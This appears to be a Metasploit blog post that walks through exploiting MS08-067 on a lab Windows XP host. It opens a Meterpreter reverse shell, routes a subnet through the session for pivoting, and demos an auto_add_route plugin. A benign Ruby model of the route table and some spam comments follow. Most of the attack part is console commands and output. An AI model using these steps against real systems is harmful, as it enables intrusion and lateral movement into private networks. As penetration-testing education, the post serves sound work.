[*] Meterpreter session 1 opened (10.1.1.1:4444 -> 10.1.1.128:1238)
meterpreter > run get_local_subnets
Local subnet: 10.1.1.0/255.255.255.0
meterpreter > background
msf exploit(ms08_067_netapi) > route add 10.1.1.0 255.255.255.0 1
msf exploit(ms08_067_netapi) > route print
Active Routing Table
====================
Subnet      Netmask          Gateway
------      -------          -------
10.1.1.0    255.255.255.0    Session 1
msf exploit(ms08_067_netapi) >
After running the above commands, any traffic sent to addresses in the 10.1.1.0 network will be tunnelled through the session. As part of my Blackhat DC presentation last week, I demoed a plugin that automatically adds a route for any previously-unseen subnets when a new session opens up. Here is some example usage and output:
msf exploit(ms08_067_netapi) > load auto_add_route
[*] Successfully loaded plugin: auto_add_route
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 10.1.1.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (10.1.1.1:4444 -> 10.1.1.128:1239)
[*] AutoAddRoute: Routing new subnet 10.1.1.0/255.255.255.0 through session 1
meterpreter > background
msf exploit(ms08_067_netapi) > route print
Active Routing Table
====================
Subnet      Netmask          Gateway
------      -------          -------
10.1.1.0    255.255.255.0    Session 1
msf exploit(ms08_067_netapi) >
The auto_add_route plugin is now available in the Metasploit trunk; run 'svn up' to get it.
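To make the "previously-unseen subnet" bookkeeping concrete, here is a small stand-alone Ruby model of a subnet-to-session route table. It is an added example, not the plugin's or the framework's own code. The class and method names (SessionRouteTable, add_if_new, session_for, remove_session) are hypothetical, and the exact-match duplicate check and most-specific-route lookup are assumptions of this model.

```ruby
require 'ipaddr'

# Illustrative model only: maps subnets to session ids the way the
# route table printed above does. Not Metasploit code.
class SessionRouteTable
  Route = Struct.new(:net, :bits, :session)

  def initialize
    @routes = []
  end

  # Add a route unless the same subnet/netmask pair is already present.
  # Returns true when a route was added, false when it was a duplicate.
  def add_if_new(subnet, netmask, session)
    net  = IPAddr.new("#{subnet}/#{netmask}")   # host bits are masked off
    bits = IPAddr.new(netmask).to_i.to_s(2).count('1')
    # IPAddr#== compares addresses only, so compare the prefix length too.
    return false if @routes.any? { |r| r.bits == bits && r.net == net }
    @routes << Route.new(net, bits, session)
    true
  end

  # Session that would carry traffic to dest, or nil if no route matches.
  # Assumption: the most specific (longest prefix) matching route wins.
  def session_for(dest)
    ip  = IPAddr.new(dest)
    hit = @routes.select { |r| r.net.include?(ip) }.max_by(&:bits)
    hit && hit.session
  end

  # Drop every route that points at a session that has closed.
  def remove_session(session)
    @routes.reject! { |r| r.session == session }
    nil
  end
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample input mirroring the transcript above.
  table = SessionRouteTable.new
  puts table.add_if_new('10.1.1.0', '255.255.255.0', 1)   # first sighting
  puts table.add_if_new('10.1.1.0', '255.255.255.0', 2)   # already routed
  puts table.session_for('10.1.1.128').inspect
  puts table.session_for('192.168.5.5').inspect
end
```

A second session reporting the same subnet leaves the table unchanged, which is why the route print output above shows a single entry however many sessions land on 10.1.1.0.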

5 comments:
Awesome.
Nice blog you got here. It would be great to read more concerning that theme. The only thing it would also be great to see here is some photos of any gadgets.
Nickolas Trider
Cell jammer
Hi! Thanks for a great site Payas..
Very, very nice site thank you
thanks